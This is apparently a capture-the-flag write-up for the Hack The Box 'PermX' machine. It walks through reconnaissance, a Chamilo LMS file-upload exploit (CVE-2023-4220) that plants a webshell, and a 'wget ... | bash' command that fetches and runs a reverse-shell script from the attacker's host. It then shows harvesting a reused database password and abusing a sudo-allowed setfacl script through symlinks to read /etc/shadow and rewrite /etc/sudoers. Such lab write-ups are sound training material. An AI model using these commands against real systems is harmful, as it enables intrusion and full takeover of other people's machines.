Recon
└──╼ $nmap -p- -A permx.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-19 13:28 UTC
Nmap scan report for permx.htb (10.129.179.162)
Host is up (0.037s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_ 256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: eLEARNING
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can traverse whole server, but nothing interesting seems to be on it.
└──╼ $ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt -u http://FUZZ.permx.htb -H "Host: FUZZ.permx.htb" -fc 302 -t 200
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://FUZZ.permx.htb
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt
:: Header : Host: FUZZ.permx.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 200
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 302
________________________________________________
www [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 45ms]
lms [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 7517ms]www subdomain doesnt seem to work, but tells us something about our next subdomain.
And the second domain seems to be our way in.
CVE-2023-4220
Checking as usualy for exploits, we can find https://github.com/Rai2en/CVE-2023-4220-Chamilo-LMS.
Seems new, so maybe its not patched. Running the test script we get:
Running the exploit gives us a webshell.
We can modify the cmd var contents, so that it creates a revese shell. In burp we can send the request to repeater, modify the cmd variable to wget -O - 10.10.14.81/shell.sh | bash, encode it, send it and we are in.
http://lms.parmx.htb/main/inc/lib/javascript/bigupload/files/webshell.php?cmd=wget -O - 10.10.14.81%2Fshell.sh | bash
For QoL, we can get shell stablisation.
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL-Z
stty raw -echo; fgUser access
From linpeas scan we can see, that there is sftp service that we can connect to localy and we know username and password for it. That may be usefull for priv esc, but for now it doesnt seem to work.
╔══════════╣ Analyzing Env Files (limit 70)
-rwxr-xr-x 1 www-data www-data 326 Nov 3 2022 /var/www/chamilo/vendor/knplabs/gaufrette/.env.dist
...
FTP_HOST=ftp
FTP_PORT=21
FTP_USER=gaufrette
FTP_PASSWORD=gaufrette
FTP_BASE_DIR=/gaufrette
MONGO_URI=mongodb://mongodb:27017
MONGO_DBNAME=gridfs_test
SFTP_HOST=sftp
SFTP_PORT=22
SFTP_USER=gaufrette
SFTP_PASSWORD=gaufrette
SFTP_BASE_DIR=gaufrette
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN - For now I was searching all of the possible config files as usualy and found more interesting content.
/var/www/chamilo/app/config/configuration.php
...
// Database connection settings.
$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
// Enable access to database management for platform admins.
$_configuration['db_manager_enabled'] = false;
...Password seems to work for mtz, so no need to login to db.
Priv esc
Running linenum again gives us interesting information:
mtz@permx:/opt$ sudo -l
Matching Defaults entries for mtz on permx:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User mtz may run the following commands on permx:
(ALL : ALL) NOPASSWD: /opt/acl.shAnd the content of /opt/acl.sh is:
#!/bin/bash
if [ "$#" -ne 3 ]; then
/usr/bin/echo "Usage: $0 user perm file"
exit 1
fi
user="$1"
perm="$2"
target="$3"
if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
/usr/bin/echo "Access denied."
exit 1
fi
# Check if the path is a file
if [ ! -f "$target" ]; then
/usr/bin/echo "Target must be a file."
exit 1
fi
/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"It seems to allow us to run setfacl as root on some files.
First thought was to abuse setfacl version.
mtz@permx:/opt$ /usr/bin/setfacl --version
setfacl 2.3.1There are some CVE’s, but none that I’ve menaged to use.
Then Ive focused on understanding execution restrictions and decided to bypass the localisation restriction using symlinks.
ln -s /etc/shadow shadow
sudo /opt/acl.sh mtz rwx /home/mtz/shadowIt does work and allows us to inspect the shadow file.
mtz@permx:~$ cat shadow
...
root:$y$j9T$VEMcaSLaOOvSE3mYgRXRv/$tNXYdTRyCAkwoSHhlyIoCS91clvPEp/hh0r4NTBlmS7:19742:0:99999:7:::
mtz:$y$j9T$RUjBgvOODKC9hyu5u7zCt0$Vf7nqZ4umh3s1N69EeoQ4N5zoid6c2SlGb1LvBFRxSB:19742:0:99999:7:::
...I could not decrypt it, so ive tried a different approach.
mtz@permx:~$ ln -s /etc/sudoers /home/mtz/sudoers
mtz@permx:~$ sudo /opt/acl.sh mtz rw /home/mtz/sudoers
mtz@permx:~$ echo "mtz ALL=(ALL:ALL) NOPASSWD: ALL" >> sudoers
mtz@permx:~$ sudo suAnd got the root flag.